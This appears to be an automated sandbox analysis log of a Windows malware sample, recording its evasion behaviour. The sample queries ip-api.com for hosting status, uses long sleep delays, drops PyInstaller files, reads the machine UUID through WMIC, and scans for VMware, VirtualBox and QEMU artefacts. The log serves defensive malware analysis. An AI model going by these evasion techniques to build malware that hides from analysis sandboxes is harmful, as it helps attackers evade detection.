                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Check if machine is in data center or colocation facility
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
                Source: C:\Users\user\AppData\Local\Temp\bound.exeMemory allocated: 254B4F50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\bound.exeMemory allocated: 254CEAA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A68816 sgdt fword ptr [rax]2_2_00007FF8E7A68816
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599828
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599657
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599508
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599357
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599225
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599108
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598969
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598843
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598710
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598591
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598483
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598374
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598266
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598141
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598016
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597904
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597768
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597656
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597437
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597296
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597188
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597078
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596969
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596844
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596735
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596610
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596485
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596360
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596235
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595360
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595235
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595106
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594981
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594766
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594638
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594532
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594407
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594297
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 588059
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6071Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5799Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5814Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\bound.exeWindow / User API: threadDelayed 3720
                Source: C:\Users\user\AppData\Local\Temp\bound.exeWindow / User API: threadDelayed 4152
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\_ctypes.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\python313.dllJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\_queue.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\_socket.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\unicodedata.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\_lzma.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\_sqlite3.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\select.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\_decimal.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\_hashlib.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\rar.exeJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\_bz2.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76122\_ssl.pydJump to dropped file
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17507
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeAPI coverage: 5.5 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep count: 6071 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5724Thread sleep count: 81 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5476Thread sleep count: 5799 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep count: 108 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6300Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764Thread sleep count: 5814 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -22136092888451448s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -599828s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -599657s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -599508s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -599357s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -599225s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -599108s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -598969s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -598843s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -598710s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -598591s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -598483s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -598374s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -598266s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -598141s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -598016s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -597904s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -597768s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -597656s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -597437s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -597296s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -597188s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -597078s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -596969s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -596844s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -596735s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -596610s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -596485s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -596360s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -596235s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -596110s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -595985s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -595860s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -595735s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -595610s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -595485s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -595360s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -595235s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -595106s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -594981s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -594766s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -594638s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -594532s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -594407s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -594297s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276Thread sleep time: -588059s >= -30000s
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7EAD083C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD09280 FindFirstFileExW,FindClose,0_2_00007FF7EAD09280
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD21874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EAD21874
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD09280 FindFirstFileExW,FindClose,2_2_00007FF7EAD09280
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7EAD083C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD21874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7EAD21874
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599828
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599657
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599508
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599357
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599225
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599108
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598969
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598843
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598710
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598591
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598483
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598374
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598266
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598141
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598016
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597904
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597768
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597656
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597437
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597296
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597188
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597078
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596969
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596844
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596735
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596610
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596485
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596360
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596235
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595360
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595235
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595106
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594981
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594766
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594638
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594532
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594407
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 594297
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 588059
                Source: Amcache.hve.29.drBinary or memory string: VMware
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dqemu-ga
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmtoolsd
                Source: Amcache.hve.29.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: decodeqemu-ga
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f15vmsrvc
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvboxservice
                Source: Amcache.hve.29.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: rfvmwareservice
                Source: Amcache.hve.29.drBinary or memory string: vmci.sys
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1463693369.000001DCB6488000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                Source: Amcache.hve.29.drBinary or memory string: VMware20,1
                Source: Amcache.hve.29.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.29.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.29.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.29.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.29.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.29.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 4Lfvmtoolsd
                Source: Amcache.hve.29.drBinary or memory string: VMware VMCI Bus Device
